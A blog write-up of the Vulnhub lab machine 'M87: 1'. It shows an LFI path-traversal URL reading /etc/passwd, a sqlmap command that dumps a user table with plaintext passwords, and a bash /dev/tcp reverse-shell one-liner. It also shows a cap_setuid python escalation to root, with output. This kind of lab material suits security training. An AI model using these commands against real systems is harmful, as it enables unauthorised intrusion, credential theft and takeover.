---
layout: post
title:  "Vulnhub - M87: 1"
date:   2020-11-16 12:00:00 +1100
category: hacking
---

## Introduction
*m87 is a simple machine, created specifically to be exploited. Don't get discouraged and always Try Harder!*  

This is [M87: 1](https://www.vulnhub.com/entry/m87-1,595/) from Vulnhub. 

## Ports
We've got 3 ports - SSH on 22, HTTP on 80 and something on port 9090, but SSH is filtered so it doesn't count. 

What's 9090? It's [cockpit](https://cockpit-project.org/), a browser based server interface.

## Cockpit
I visit the site (https://192.168.1.141:9090) and we have a login page wanting linux user credentials. We don't have any. We'll return to this later.

## HTTP
The front page of the website is a login form (HTML), it wants an email address and a password. We don't have either of those things. 

I ran some gobuster scans; we can find */admin*, which has another HTML login form, and */admin/backup/index.php*, which has *another* login form.

I try some password attacks on the *admin* page with the username *admin*, but no dice. I try searching for hidden files on the webserver with extensive gobuster scans and lots of file extensions; nothing. Now what?

The login on */admin/backup/index.php* comes in the form of 

>/admin/backup/index.php?username=something&password=somethingelse

This is the main thing I took from this box - fuzz this form for other fields.

## Fuzzing
There are many ways to do this but I used Burp Suite Turbo Intruder and the */usr/share/seclists/Discovery/Web-Content/common.txt* file to find two 'extra' parameters of interest - **id** and **file**. In this case my url is:

>/admin/backup/index.php?%s

The parameter *file* gives an LFI. I read */etc/passwd* and learn our user is called *charlotte*, e.g.

``
http://192.168.1.141/admin/backup/index.php?file=../../../../../../../../../../../../etc/passwd
``

I try various things to leverage this into RCE but can't find a way, with no access to */proc/self/environ* or Apache logs etc. I also can't find an SSH key, I can't read Charlotte's bash history etc. What other options do we have? Let's try **id**:

The *id* parameter (initially) only gives me one error message:

>Connect failed: No such file or directory

I google this and it *could* be a MySQL error, or something else. It's sufficiently vague to not be definitive. I can't get it to do anything else.

### Stumped
At this point (well, after trying and failing for some time) I check a hint. In fact the *id* parameter is supposed to prompt a different error. I reboot the VM; no change. I recreate the VM from the OVA file - success! Now the *id* parameter prompts an error message about SQL syntax. So we do have a database connection here. Note that I had previously tried SQLMap on the *username* and *password* fields to no success.

Anyway, *id* may be SQL injectable. I use sqlmap in Burp Suite:

``
-u 'http://192.168.1.141:80/admin/backup/index.php?id=../../../../../../../../../../etc/passwd' -p 'id' --dump
``

And I get a bunch of users:

{% highlight shell %}
root@kali:/opt/vulnhub/m87# cat users.csv 
id,email,username,password
1,jack@localhost,jack,gae5g5a
2,ceo@localhost,ceo,5t96y4i95y
3,brad@localhost,brad,gae5g5a
4,expenses@localhost,expenses,5t96y4i95y
5,julia@localhost,julia,fw54vrfwe45
6,mike@localhost,mike,4kworw4
7,adrian@localhost,adrian,fw54vrfwe45
8,john@localhost,john,4kworw4
9,admin@localhost,admin,15The4Dm1n4L1f3
10,alex@localhost,alex,dsfsrw4
{% endhighlight %}

## Cockpit
Since SSH is filtered, we need a way to login. This is where cockpit comes in. 

None of our users are called *charlotte*, but I guessed there might be some password reuse. Sure enough, the password for admin (above) is the password for *charlotte*. So it's back to cockpit to log in. I hadn't seen this before but it's a nice enough GUI interface - and you can access a terminal, which is what I do. I then use that to send myself a shell to a netcat listener:

``
bash -i >& /dev/tcp/192.168.1.77/1234 0>&1
``

## Privesc
There's some trickery going on, because *linpeas* recognises two SUID binaries it thinks are slam dunks - *watch* and *rsync*. Although the techniques in GTFOBins work, they only give back shells as *charlotte*. So that doesn't help.

Linpeas also identifies a binary with the **cap_setuid+ep** capability - it's called */usr/bin/old*. What is it? As it turns out, it's python (2). And the technique at GTFOBins does work for that.

{% highlight shell %}
charlotte@M87:/dev/shm$ file /usr/bin/old
file /usr/bin/old
/usr/bin/old: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a59cad4ea461069ab45e846552c0dc6ed45ef466, stripped
charlotte@M87:/dev/shm$ /usr/bin/old
/usr/bin/old
Python 2.7.16 (default, Oct 10 2019, 22:02:15) 
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
exit()
charlotte@M87:/dev/shm$ /usr/bin/old -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/old -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1000(charlotte) groups=1000(charlotte),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
# cd /root/
cd /root/
# ls -lash
ls -lash
total 28K
4.0K drwx------  4 root root 4.0K Nov  6 08:36 .
4.0K drwxr-xr-x 18 root root 4.0K Nov  6 06:49 ..
   0 lrwxrwxrwx  1 root root    9 Nov  6 06:58 .bash_history -> /dev/null
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K drwx------  3 root root 4.0K Nov  6 08:36 .gnupg
4.0K drwxr-xr-x  3 root root 4.0K Nov  6 08:00 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.2K Nov  6 08:36 proof.txt
# cat proof.txt
cat proof.txt

ASCII ART REMOVED

Congratulations!

mindsflee
{% endhighlight %}


## Wrapup
This box was a touch flaky - I had to reboot it a few times - and I had that issue with *id* not prompting the right error. But I did learn a lesson about fuzzing for parameters and saw cockpit for the first time.
